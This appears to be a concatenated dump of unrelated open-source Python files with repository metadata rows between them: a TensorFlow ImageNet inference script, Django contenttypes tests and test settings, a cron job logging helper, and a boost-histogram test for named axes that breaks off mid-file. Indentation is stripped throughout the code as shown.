# Loads the final mapping of integer node ID to human-readable string
node_id_to_name = {}
for key, val in node_id_to_uid.items():
if val not in uid_to_human:
tf.logging.fatal('Failed to locate: %s', val)
name = uid_to_human[val]
node_id_to_name[key] = name
return node_id_to_name
def id_to_string(self, node_id):
if node_id not in self.node_lookup:
return ''
return self.node_lookup[node_id]
def create_graph(FLAGS):
"""Creates a graph from saved GraphDef file and returns a saver."""
# Creates graph from saved graph_def.pb.
with tf.gfile.FastGFile(os.path.join(
FLAGS.model_dir, 'classify_image_graph_def.pb'), 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name='')
def run_inference_on_image(image,FLAGS):
"""Runs inference on an image.
Args:
image: Image file name.
Returns:
Nothing
"""
if not tf.gfile.Exists(image):
tf.logging.fatal('File does not exist %s', image)
image_data = tf.gfile.FastGFile(image, 'rb').read()
# Creates graph from saved GraphDef.
create_graph(FLAGS)
with tf.Session() as sess:
# Some useful tensors:
# 'softmax:0': A tensor containing the normalized prediction across
# 1000 labels.
# 'pool_3:0': A tensor containing the next-to-last layer containing 2048
# float description of the image.
# 'DecodeJpeg/contents:0': A tensor containing a string providing JPEG
# encoding of the image.
# Runs the softmax tensor by feeding the image_data as input to the graph.
softmax_tensor = sess.graph.get_tensor_by_name('softmax:0')
predictions = sess.run(softmax_tensor,
{'DecodeJpeg/contents:0': image_data})
predictions = np.squeeze(predictions)
# Creates node ID --> English string lookup.
node_lookup = NodeLookup(FLAGS)
top_k = predictions.argsort()[-FLAGS.num_top_predictions:][::-1]
result = []
for node_id in top_k:
human_string = node_lookup.id_to_string(node_id)
score = predictions[node_id]
result.append({"keyword":human_string, "score":np.float64(score)})
print('%s (score = %.5f)' % (human_string, np.float64(score)))
return result
def maybe_download_and_extract(FLAGS):
"""Download and extract model tar file."""
dest_directory = FLAGS.model_dir
if not os.path.exists(dest_directory):
os.makedirs(dest_directory)
filename = DATA_URL.split('/')[-1]
filepath = os.path.join(dest_directory, filename)
if not os.path.exists(filepath):
def _progress(count, block_size, total_size):
sys.stdout.write('\r>> Downloading %s %.1f%%' % (
filename, float(count * block_size) / float(total_size) * 100.0))
sys.stdout.flush()
filepath, _ = urllib.request.urlretrieve(DATA_URL, filepath, _progress)
print()
statinfo = os.stat(filepath)
print('Successfully downloaded', filename, statinfo.st_size, 'bytes.')
tarfile.open(filepath, 'r:gz').extractall(dest_directory)
def main(imgfile):
parser = argparse.ArgumentParser()
# classify_image_graph_def.pb:
# Binary representation of the GraphDef protocol buffer.
# imagenet_synset_to_human_label_map.txt:
# Map from synset ID to a human readable string.
# imagenet_2012_challenge_label_map_proto.pbtxt:
# Text representation of a protocol buffer mapping a label to synset ID.
parser.add_argument(
'--model_dir',
type=str,
default='/tmp/imagenet',
help="""\
Path to classify_image_graph_def.pb,
imagenet_synset_to_human_label_map.txt, and
imagenet_2012_challenge_label_map_proto.pbtxt.\
"""
)
parser.add_argument(
'--image_file',
type=str,
default=imgfile,
help='Absolute path to image file.'
)
parser.add_argument(
'--num_top_predictions',
type=int,
default=5,
help='Display this many predictions.'
)
FLAGS, unparsed = parser.parse_known_args()
print("flagflagflag")
print(FLAGS)
# classify_image_graph_def.pb:
# Binary representation of the GraphDef protocol buffer.
# imagenet_synset_to_human_label_map.txt:
# Map from synset ID to a human readable string.
# imagenet_2012_challenge_label_map_proto.pbtxt:
# Text representation of a protocol buffer mapping a label to synset ID.
maybe_download_and_extract(FLAGS)
image = (FLAGS.image_file if FLAGS.image_file else
os.path.join(FLAGS.model_dir, 'cropped_panda.jpg'))
return run_inference_on_image(image,FLAGS)
if __name__ == '__main__':
print("I AM YOUR FATHER")
print("I AM YOUR FATHER")
print("I AM YOUR FATHER")
print("I AM YOUR FATHER")
print("I AM YOUR FATHER")
print("I AM YOUR FATHER")
print("I AM YOUR FATHER")
parser = argparse.ArgumentParser()
# classify_image_graph_def.pb:
# Binary representation of the GraphDef protocol buffer.
# imagenet_synset_to_human_label_map.txt:
# Map from synset ID to a human readable string.
# imagenet_2012_challenge_label_map_proto.pbtxt:
# Text representation of a protocol buffer mapping a label to synset ID.
parser.add_argument(
'--model_dir',
type=str,
default='/tmp/imagenet',
help="""\
Path to classify_image_graph_def.pb,
imagenet_synset_to_human_label_map.txt, and
imagenet_2012_challenge_label_map_proto.pbtxt.\
"""
)
parser.add_argument(
'--image_file',
type=str,
default='',
help='Absolute path to image file.'
)
parser.add_argument(
'--num_top_predictions',
type=int,
default=5,
help='Display this many predictions.'
)
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| 33.671429
| 90
| 0.700891
|
794b1e34ef6bcc5cf87a180e19b42e89714d9cfc
| 22,812
|
py
|
Python
|
tests/contenttypes_tests/tests.py
|
kkoralsky/django
|
924af638e4d4fb8eb46a19ac0cafcb2e83480cf3
|
[
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/contenttypes_tests/tests.py
|
kkoralsky/django
|
924af638e4d4fb8eb46a19ac0cafcb2e83480cf3
|
[
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/contenttypes_tests/tests.py
|
kkoralsky/django
|
924af638e4d4fb8eb46a19ac0cafcb2e83480cf3
|
[
"PSF-2.0",
"BSD-3-Clause"
] | 1
|
2020-02-06T10:31:51.000Z
|
2020-02-06T10:31:51.000Z
|
import datetime
from unittest import mock
from django.apps.registry import Apps, apps
from django.conf import settings
from django.contrib.contenttypes import management as contenttypes_management
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.core import checks, management
from django.core.management import call_command
from django.db import connections, migrations, models
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, override_settings,
)
from django.test.utils import captured_stdout, isolate_apps
from .models import (
Article, Author, ModelWithNullFKToSite, Post, SchemeIncludedURL,
Site as MockSite,
)
@override_settings(ROOT_URLCONF='contenttypes_tests.urls')
class ContentTypesViewsTests(TestCase):
@classmethod
def setUpTestData(cls):
# don't use the manager because we want to ensure the site exists
# with pk=1, regardless of whether or not it already exists.
cls.site1 = Site(pk=1, domain='testserver', name='testserver')
cls.site1.save()
cls.author1 = Author.objects.create(name='Boris')
cls.article1 = Article.objects.create(
title='Old Article', slug='old_article', author=cls.author1,
date_created=datetime.datetime(2001, 1, 1, 21, 22, 23)
)
cls.article2 = Article.objects.create(
title='Current Article', slug='current_article', author=cls.author1,
date_created=datetime.datetime(2007, 9, 17, 21, 22, 23)
)
cls.article3 = Article.objects.create(
title='Future Article', slug='future_article', author=cls.author1,
date_created=datetime.datetime(3000, 1, 1, 21, 22, 23)
)
cls.scheme1 = SchemeIncludedURL.objects.create(url='http://test_scheme_included_http/')
cls.scheme2 = SchemeIncludedURL.objects.create(url='https://test_scheme_included_https/')
cls.scheme3 = SchemeIncludedURL.objects.create(url='//test_default_scheme_kept/')
def setUp(self):
Site.objects.clear_cache()
def test_shortcut_with_absolute_url(self):
"Can view a shortcut for an Author object that has a get_absolute_url method"
for obj in Author.objects.all():
short_url = '/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Author).id, obj.pk)
response = self.client.get(short_url)
self.assertRedirects(response, 'http://testserver%s' % obj.get_absolute_url(),
status_code=302, target_status_code=404)
def test_shortcut_with_absolute_url_including_scheme(self):
"""
Can view a shortcut when object's get_absolute_url returns a full URL
the tested URLs are: "http://...", "https://..." and "//..."
"""
for obj in SchemeIncludedURL.objects.all():
short_url = '/shortcut/%s/%s/' % (ContentType.objects.get_for_model(SchemeIncludedURL).id, obj.pk)
response = self.client.get(short_url)
self.assertRedirects(response, obj.get_absolute_url(),
status_code=302,
fetch_redirect_response=False)
def test_shortcut_no_absolute_url(self):
"Shortcuts for an object that has no get_absolute_url method raises 404"
for obj in Article.objects.all():
short_url = '/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Article).id, obj.pk)
response = self.client.get(short_url)
self.assertEqual(response.status_code, 404)
def test_wrong_type_pk(self):
short_url = '/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Author).id, 'nobody/expects')
response = self.client.get(short_url)
self.assertEqual(response.status_code, 404)
def test_shortcut_bad_pk(self):
short_url = '/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Author).id, '42424242')
response = self.client.get(short_url)
self.assertEqual(response.status_code, 404)
def test_nonint_content_type(self):
an_author = Author.objects.all()[0]
short_url = '/shortcut/%s/%s/' % ('spam', an_author.pk)
response = self.client.get(short_url)
self.assertEqual(response.status_code, 404)
def test_bad_content_type(self):
an_author = Author.objects.all()[0]
short_url = '/shortcut/%s/%s/' % (42424242, an_author.pk)
response = self.client.get(short_url)
self.assertEqual(response.status_code, 404)
@mock.patch('django.apps.apps.get_model')
def test_shortcut_view_with_null_site_fk(self, get_model):
"""
The shortcut view works if a model's ForeignKey to site is None.
"""
get_model.side_effect = lambda *args, **kwargs: MockSite if args[0] == 'sites.Site' else ModelWithNullFKToSite
obj = ModelWithNullFKToSite.objects.create(title='title')
url = '/shortcut/%s/%s/' % (ContentType.objects.get_for_model(ModelWithNullFKToSite).id, obj.pk)
response = self.client.get(url)
self.assertRedirects(
response, '%s' % obj.get_absolute_url(),
fetch_redirect_response=False,
)
def test_create_contenttype_on_the_spot(self):
"""
Make sure ContentTypeManager.get_for_model creates the corresponding
content type if it doesn't exist in the database (for some reason).
"""
class ModelCreatedOnTheFly(models.Model):
name = models.CharField()
class Meta:
verbose_name = 'a model created on the fly'
app_label = 'my_great_app'
apps = Apps()
ct = ContentType.objects.get_for_model(ModelCreatedOnTheFly)
self.assertEqual(ct.app_label, 'my_great_app')
self.assertEqual(ct.model, 'modelcreatedonthefly')
self.assertEqual(str(ct), 'modelcreatedonthefly')
@override_settings(SILENCED_SYSTEM_CHECKS=['fields.W342']) # ForeignKey(unique=True)
@isolate_apps('contenttypes_tests', attr_name='apps')
class GenericForeignKeyTests(SimpleTestCase):
def test_str(self):
class Model(models.Model):
field = GenericForeignKey()
self.assertEqual(str(Model.field), "contenttypes_tests.Model.field")
def test_missing_content_type_field(self):
class TaggedItem(models.Model):
# no content_type field
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey()
errors = TaggedItem.content_object.check()
expected = [
checks.Error(
"The GenericForeignKey content type references the non-existent field 'TaggedItem.content_type'.",
obj=TaggedItem.content_object,
id='contenttypes.E002',
)
]
self.assertEqual(errors, expected)
def test_invalid_content_type_field(self):
class Model(models.Model):
content_type = models.IntegerField() # should be ForeignKey
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey(
'content_type', 'object_id')
errors = Model.content_object.check()
expected = [
checks.Error(
"'Model.content_type' is not a ForeignKey.",
hint=(
"GenericForeignKeys must use a ForeignKey to "
"'contenttypes.ContentType' as the 'content_type' field."
),
obj=Model.content_object,
id='contenttypes.E003',
)
]
self.assertEqual(errors, expected)
def test_content_type_field_pointing_to_wrong_model(self):
class Model(models.Model):
content_type = models.ForeignKey('self', models.CASCADE) # should point to ContentType
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey(
'content_type', 'object_id')
errors = Model.content_object.check()
expected = [
checks.Error(
"'Model.content_type' is not a ForeignKey to 'contenttypes.ContentType'.",
hint=(
"GenericForeignKeys must use a ForeignKey to "
"'contenttypes.ContentType' as the 'content_type' field."
),
obj=Model.content_object,
id='contenttypes.E004',
)
]
self.assertEqual(errors, expected)
def test_missing_object_id_field(self):
class TaggedItem(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
# missing object_id field
content_object = GenericForeignKey()
errors = TaggedItem.content_object.check()
expected = [
checks.Error(
"The GenericForeignKey object ID references the non-existent field 'object_id'.",
obj=TaggedItem.content_object,
id='contenttypes.E001',
)
]
self.assertEqual(errors, expected)
def test_field_name_ending_with_underscore(self):
class Model(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object_ = GenericForeignKey(
'content_type', 'object_id')
errors = Model.content_object_.check()
expected = [
checks.Error(
'Field names must not end with an underscore.',
obj=Model.content_object_,
id='fields.E001',
)
]
self.assertEqual(errors, expected)
@override_settings(INSTALLED_APPS=['django.contrib.auth', 'django.contrib.contenttypes', 'contenttypes_tests'])
def test_generic_foreign_key_checks_are_performed(self):
class Model(models.Model):
content_object = GenericForeignKey()
with mock.patch.object(GenericForeignKey, 'check') as check:
checks.run_checks(app_configs=self.apps.get_app_configs())
check.assert_called_once_with()
@isolate_apps('contenttypes_tests')
class GenericRelationshipTests(SimpleTestCase):
def test_valid_generic_relationship(self):
class TaggedItem(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey()
class Bookmark(models.Model):
tags = GenericRelation('TaggedItem')
errors = Bookmark.tags.field.check()
self.assertEqual(errors, [])
def test_valid_generic_relationship_with_explicit_fields(self):
class TaggedItem(models.Model):
custom_content_type = models.ForeignKey(ContentType, models.CASCADE)
custom_object_id = models.PositiveIntegerField()
content_object = GenericForeignKey(
'custom_content_type', 'custom_object_id')
class Bookmark(models.Model):
tags = GenericRelation(
'TaggedItem',
content_type_field='custom_content_type',
object_id_field='custom_object_id',
)
errors = Bookmark.tags.field.check()
self.assertEqual(errors, [])
def test_pointing_to_missing_model(self):
class Model(models.Model):
rel = GenericRelation('MissingModel')
errors = Model.rel.field.check()
expected = [
checks.Error(
"Field defines a relation with model 'MissingModel', "
"which is either not installed, or is abstract.",
obj=Model.rel.field,
id='fields.E300',
)
]
self.assertEqual(errors, expected)
def test_valid_self_referential_generic_relationship(self):
class Model(models.Model):
rel = GenericRelation('Model')
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey(
'content_type', 'object_id')
errors = Model.rel.field.check()
self.assertEqual(errors, [])
def test_missing_generic_foreign_key(self):
class TaggedItem(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
class Bookmark(models.Model):
tags = GenericRelation('TaggedItem')
errors = Bookmark.tags.field.check()
expected = [
checks.Error(
"The GenericRelation defines a relation with the model "
"'contenttypes_tests.TaggedItem', but that model does not have a "
"GenericForeignKey.",
obj=Bookmark.tags.field,
id='contenttypes.E004',
)
]
self.assertEqual(errors, expected)
@override_settings(TEST_SWAPPED_MODEL='contenttypes_tests.Replacement')
def test_pointing_to_swapped_model(self):
class Replacement(models.Model):
pass
class SwappedModel(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey()
class Meta:
swappable = 'TEST_SWAPPED_MODEL'
class Model(models.Model):
rel = GenericRelation('SwappedModel')
errors = Model.rel.field.check()
expected = [
checks.Error(
"Field defines a relation with the model "
"'contenttypes_tests.SwappedModel', "
"which has been swapped out.",
hint="Update the relation to point at 'settings.TEST_SWAPPED_MODEL'.",
obj=Model.rel.field,
id='fields.E301',
)
]
self.assertEqual(errors, expected)
def test_field_name_ending_with_underscore(self):
class TaggedItem(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey()
class InvalidBookmark(models.Model):
tags_ = GenericRelation('TaggedItem')
errors = InvalidBookmark.tags_.field.check()
expected = [
checks.Error(
'Field names must not end with an underscore.',
obj=InvalidBookmark.tags_.field,
id='fields.E001',
)
]
self.assertEqual(errors, expected)
class UpdateContentTypesTests(TestCase):
def setUp(self):
self.before_count = ContentType.objects.count()
self.content_type = ContentType.objects.create(app_label='contenttypes_tests', model='Fake')
self.app_config = apps.get_app_config('contenttypes_tests')
def test_interactive_true_with_dependent_objects(self):
"""
interactive mode of remove_stale_contenttypes (the default) should
delete stale contenttypes and warn of dependent objects.
"""
post = Post.objects.create(title='post', content_type=self.content_type)
# A related object is needed to show that a custom collector with
# can_fast_delete=False is needed.
ModelWithNullFKToSite.objects.create(post=post)
with mock.patch('builtins.input', return_value='yes'):
with captured_stdout() as stdout:
call_command('remove_stale_contenttypes', verbosity=2, stdout=stdout)
self.assertEqual(Post.objects.count(), 0)
output = stdout.getvalue()
self.assertIn('- Content type for contenttypes_tests.Fake', output)
self.assertIn('- 1 contenttypes_tests.Post object(s)', output)
self.assertIn('- 1 contenttypes_tests.ModelWithNullFKToSite', output)
self.assertIn('Deleting stale content type', output)
self.assertEqual(ContentType.objects.count(), self.before_count)
def test_interactive_true_without_dependent_objects(self):
"""
interactive mode of remove_stale_contenttypes (the default) should
delete stale contenttypes even if there aren't any dependent objects.
"""
with mock.patch('builtins.input', return_value='yes'):
with captured_stdout() as stdout:
call_command('remove_stale_contenttypes', verbosity=2)
self.assertIn("Deleting stale content type", stdout.getvalue())
self.assertEqual(ContentType.objects.count(), self.before_count)
def test_interactive_false(self):
"""
non-interactive mode of remove_stale_contenttypes shouldn't delete
stale content types.
"""
with captured_stdout() as stdout:
call_command('remove_stale_contenttypes', interactive=False, verbosity=2)
self.assertIn("Stale content types remain.", stdout.getvalue())
self.assertEqual(ContentType.objects.count(), self.before_count + 1)
def test_unavailable_content_type_model(self):
"""
A ContentType shouldn't be created if the model isn't available.
"""
apps = Apps()
with self.assertNumQueries(0):
contenttypes_management.create_contenttypes(self.app_config, interactive=False, verbosity=0, apps=apps)
self.assertEqual(ContentType.objects.count(), self.before_count + 1)
class TestRouter:
def db_for_read(self, model, **hints):
return 'other'
def db_for_write(self, model, **hints):
return 'default'
@override_settings(DATABASE_ROUTERS=[TestRouter()])
class ContentTypesMultidbTestCase(TestCase):
def setUp(self):
# Whenever a test starts executing, only the "default" database is
# connected. We explicitly connect to the "other" database here. If we
# don't do it, then it will be implicitly connected later when we query
# it, but in that case some database backends may automatically perform
# extra queries upon connecting (notably mysql executes
# "SET SQL_AUTO_IS_NULL = 0"), which will affect assertNumQueries().
connections['other'].ensure_connection()
def test_multidb(self):
"""
When using multiple databases, ContentType.objects.get_for_model() uses
db_for_read().
"""
ContentType.objects.clear_cache()
with self.assertNumQueries(0, using='default'), \
self.assertNumQueries(1, using='other'):
ContentType.objects.get_for_model(Author)
@override_settings(
MIGRATION_MODULES=dict(settings.MIGRATION_MODULES, contenttypes_tests='contenttypes_tests.operations_migrations'),
)
class ContentTypeOperationsTests(TransactionTestCase):
available_apps = [
'contenttypes_tests',
'django.contrib.contenttypes',
]
def setUp(self):
app_config = apps.get_app_config('contenttypes_tests')
models.signals.post_migrate.connect(self.assertOperationsInjected, sender=app_config)
def tearDown(self):
app_config = apps.get_app_config('contenttypes_tests')
models.signals.post_migrate.disconnect(self.assertOperationsInjected, sender=app_config)
def assertOperationsInjected(self, plan, **kwargs):
for migration, _backward in plan:
operations = iter(migration.operations)
for operation in operations:
if isinstance(operation, migrations.RenameModel):
next_operation = next(operations)
self.assertIsInstance(next_operation, contenttypes_management.RenameContentType)
self.assertEqual(next_operation.app_label, migration.app_label)
self.assertEqual(next_operation.old_model, operation.old_name_lower)
self.assertEqual(next_operation.new_model, operation.new_name_lower)
def test_existing_content_type_rename(self):
ContentType.objects.create(app_label='contenttypes_tests', model='foo')
management.call_command(
'migrate', 'contenttypes_tests', database='default', interactive=False, verbosity=0,
)
self.assertFalse(ContentType.objects.filter(app_label='contenttypes_tests', model='foo').exists())
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='renamedfoo').exists())
management.call_command(
'migrate', 'contenttypes_tests', 'zero', database='default', interactive=False, verbosity=0,
)
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='foo').exists())
self.assertFalse(ContentType.objects.filter(app_label='contenttypes_tests', model='renamedfoo').exists())
def test_missing_content_type_rename_ignore(self):
management.call_command(
'migrate', 'contenttypes_tests', database='default', interactive=False, verbosity=0,
)
self.assertFalse(ContentType.objects.filter(app_label='contenttypes_tests', model='foo').exists())
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='renamedfoo').exists())
management.call_command(
'migrate', 'contenttypes_tests', 'zero', database='default', interactive=False, verbosity=0,
)
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='foo').exists())
self.assertFalse(ContentType.objects.filter(app_label='contenttypes_tests', model='renamedfoo').exists())
def test_content_type_rename_conflict(self):
ContentType.objects.create(app_label='contenttypes_tests', model='foo')
ContentType.objects.create(app_label='contenttypes_tests', model='renamedfoo')
management.call_command(
'migrate', 'contenttypes_tests', database='default', interactive=False, verbosity=0,
)
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='foo').exists())
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='renamedfoo').exists())
management.call_command(
'migrate', 'contenttypes_tests', 'zero', database='default', interactive=False, verbosity=0,
)
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='foo').exists())
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='renamedfoo').exists())
| 42.960452
| 118
| 0.654392
|
794b1e6457a3dc6107c09a9441b4a2f56be9e62a
| 2,741
|
py
|
Python
|
bin/job_log.py
|
SlavomirMazurPantheon/sdo_analysis
|
777fed89dcc098fed5c539c37e5f44c2bfa80c0a
|
[
"Apache-2.0"
] | null | null | null |
bin/job_log.py
|
SlavomirMazurPantheon/sdo_analysis
|
777fed89dcc098fed5c539c37e5f44c2bfa80c0a
|
[
"Apache-2.0"
] | null | null | null |
bin/job_log.py
|
SlavomirMazurPantheon/sdo_analysis
|
777fed89dcc098fed5c539c37e5f44c2bfa80c0a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright The IETF Trust 2020, All Rights Reserved
# This software is licensed to you under the terms of the Apache License, Version 2.0 (the 'License").
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
# The code, technical concepts, and all information contained herein, are the property of Cisco Technology, Inc.
# and/or its affiliated entities, under various laws including copyright, international treaties, patent,
# and/or contract. Any use of the material herein must be in accordance with the terms of the License.
# All rights not expressly granted by the License are reserved.
# Unless required by applicable law or agreed to separately in writing, software distributed under the
# License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied.
__author__ = 'Slavomir Mazur'
__copyright__ = 'Copyright The IETF Trust 2020, All Rights Reserved'
__license__ = 'Apache License, Version 2.0'
__email__ = 'slavomir.mazur@pantheon.tech'
import argparse
import json
from create_config import create_config
def job_log(start_time: int, end_time: int, temp_dir: str, filename: str, messages: list = [], status: str = ''):
result = {}
result['start'] = start_time
result['end'] = end_time
result['status'] = status
result['messages'] = messages
try:
with open('{}/cronjob.json'.format(temp_dir), 'r') as f:
file_content = json.load(f)
except:
file_content = {}
last_successfull = None
# If successfull rewrite, otherwise use last_successfull value from JSON
if status == 'Success':
last_successfull = end_time
else:
try:
previous_state = file_content.get(filename)
last_successfull = previous_state.get('last_successfull')
except:
last_successfull = None
result['last_successfull'] = last_successfull
file_content[filename] = result
with open('{}/cronjob.json'.format(temp_dir), 'w') as f:
f.write(json.dumps(file_content, indent=4))
if __name__ == '__main__':
config = create_config()
temp_dir = config.get('Directory-Section', 'temp')
parser = argparse.ArgumentParser()
parser.add_argument('--start', default=0, help='Cronjob start time', required=True)
parser.add_argument('--end', default=0, help='Cronjob end time', required=True)
parser.add_argument('--status', default='Fail', help='Result of cronjob run', required=True)
parser.add_argument('--filename', default='', help='Name of job', required=True)
args = parser.parse_args()
job_log(int(args.start), int(args.end), temp_dir, args.filename, status=args.status)
| 40.910448
| 113
| 0.707406
|
794b1ed353428ceaa551b4f159e11448a0f4c4ad
| 2,151
|
py
|
Python
|
server_guardian/tests/test_settings.py
|
bitmazk/django-server-guardian
|
1b6f642b8aa9abd03ef86f9879432cb0d0260375
|
[
"MIT"
] | null | null | null |
server_guardian/tests/test_settings.py
|
bitmazk/django-server-guardian
|
1b6f642b8aa9abd03ef86f9879432cb0d0260375
|
[
"MIT"
] | null | null | null |
server_guardian/tests/test_settings.py
|
bitmazk/django-server-guardian
|
1b6f642b8aa9abd03ef86f9879432cb0d0260375
|
[
"MIT"
] | null | null | null |
"""Settings that need to be set in order to run the tests."""
import os
DEBUG = True
SITE_ID = 1
APP_ROOT = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..'))
DJANGO_PROJECT_ROOT = os.path.join(APP_ROOT, '..')
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
ROOT_URLCONF = 'server_guardian.tests.urls'
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(APP_ROOT, '../app_static')
MEDIA_ROOT = os.path.join(APP_ROOT, '../app_media')
STATICFILES_DIRS = (
os.path.join(APP_ROOT, 'static'),
)
TEMPLATES = [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'DIRS': [os.path.join(APP_ROOT, 'tests/test_app/templates')],
'OPTIONS': {
'context_processors': (
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.request',
)
}
}]
EXTERNAL_APPS = [
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django.contrib.sitemaps',
'django.contrib.sites',
]
INTERNAL_APPS = [
'server_guardian',
'server_guardian_api',
'server_guardian.tests.test_app',
]
SERVER_GUARDIAN_SECURITY_TOKEN = 'foobar'
LOGIN_URL = 'admin/login/'
LOCKFILE_FOLDER = os.path.join(APP_ROOT, '../lockfile')
INSTALLED_APPS = EXTERNAL_APPS + INTERNAL_APPS
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
SECRET_KEY = 'foobar'
FROM_EMAIL = 'foobar@example.com'
EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
ADMINS = (
('Fooman Barster', 'fooman.barster@example.com'),
)
| 25.305882
| 69
| 0.69549
|
794b1f3af04769f5d19955cd302cb3af26a28a57
| 5,220
|
py
|
Python
|
tests/test_minihist_title.py
|
andrzejnovak/boost-histogram
|
cdbfabb1c22f5545bf3900be01f2025411e699f1
|
[
"BSD-3-Clause"
] | 105
|
2019-03-08T14:59:37.000Z
|
2022-03-11T12:46:17.000Z
|
tests/test_minihist_title.py
|
andrzejnovak/boost-histogram
|
cdbfabb1c22f5545bf3900be01f2025411e699f1
|
[
"BSD-3-Clause"
] | 400
|
2019-03-11T23:10:18.000Z
|
2022-03-25T14:02:06.000Z
|
tests/test_minihist_title.py
|
andrzejnovak/boost-histogram
|
cdbfabb1c22f5545bf3900be01f2025411e699f1
|
[
"BSD-3-Clause"
] | 25
|
2019-03-11T18:02:31.000Z
|
2022-03-10T20:14:22.000Z
|
# The point of this test is to make sure that the infrastructure for supporting
# custom attributes, like title in Hist, is working.
import pytest
import boost_histogram as bh
# First, make a new family to identify your library
CUSTOM_FAMILY = object()
# Add named axes
class NamedAxesTuple(bh.axis.AxesTuple):
__slots__ = ()
def _get_index_by_name(self, name):
if not isinstance(name, str):
return name
for i, ax in enumerate(self):
if ax.name == name:
return i
raise KeyError(f"{name} not found in axes")
def __getitem__(self, item):
if isinstance(item, slice):
item = slice(
self._get_index_by_name(item.start),
self._get_index_by_name(item.stop),
self._get_index_by_name(item.step),
)
else:
item = self._get_index_by_name(item)
return super().__getitem__(item)
@property
def name(self):
"""
The names of the axes. May be empty strings.
"""
return tuple(ax.name for ax in self)
@name.setter
def name(self, values):
for ax, val in zip(self, values):
ax._ax.metadata["name"] = f"test: {val}"
# When you subclass Histogram or an Axes, you should register your family so
# boost-histogram will know what to convert C++ objects into.
class AxesMixin:
__slots__ = ()
# Only required for placing the Mixin first
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
@property
def name(self):
"""
Get the name for the Regular axis
"""
return self._ax.metadata.get("name", "")
# The order of the mixin is important here - it must be first
# if it needs to override bh.axis.Regular, otherwise, last is simpler,
# as it doesn't need to forward __init_subclass__ kwargs then.
class Regular(bh.axis.Regular, AxesMixin, family=CUSTOM_FAMILY):
__slots__ = ()
def __init__(self, bins, start, stop, name):
super().__init__(bins, start, stop)
self._ax.metadata["name"] = name
class Integer(AxesMixin, bh.axis.Integer, family=CUSTOM_FAMILY):
__slots__ = ()
def __init__(self, start, stop, name):
super().__init__(start, stop)
self._ax.metadata["name"] = name
class CustomHist(bh.Histogram, family=CUSTOM_FAMILY):
def _generate_axes_(self):
return NamedAxesTuple(self._axis(i) for i in range(self.ndim))
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
valid_names = [ax.name for ax in self.axes if ax.name]
if len(valid_names) != len(set(valid_names)):
msg = "{} instance cannot contain axes with duplicated names".format(
self.__class__.__name__
)
raise KeyError(msg)
def test_hist_creation():
hist_1 = CustomHist(Regular(10, 0, 1, name="a"), Integer(0, 4, name="b"))
assert hist_1.axes[0].name == "a"
assert hist_1.axes[1].name == "b"
hist_2 = CustomHist(Regular(10, 0, 1, name=""), Regular(20, 0, 4, name=""))
assert hist_2.axes[0].name == ""
assert hist_2.axes[1].name == ""
with pytest.raises(KeyError):
CustomHist(Regular(10, 0, 1, name="a"), Regular(20, 0, 4, name="a"))
def test_hist_index():
hist_1 = CustomHist(Regular(10, 0, 1, name="a"), Regular(20, 0, 4, name="b"))
assert hist_1.axes[0].name == "a"
assert hist_1.axes[1].name == "b"
def test_hist_convert():
hist_1 = CustomHist(Regular(10, 0, 1, name="a"), Integer(0, 4, name="b"))
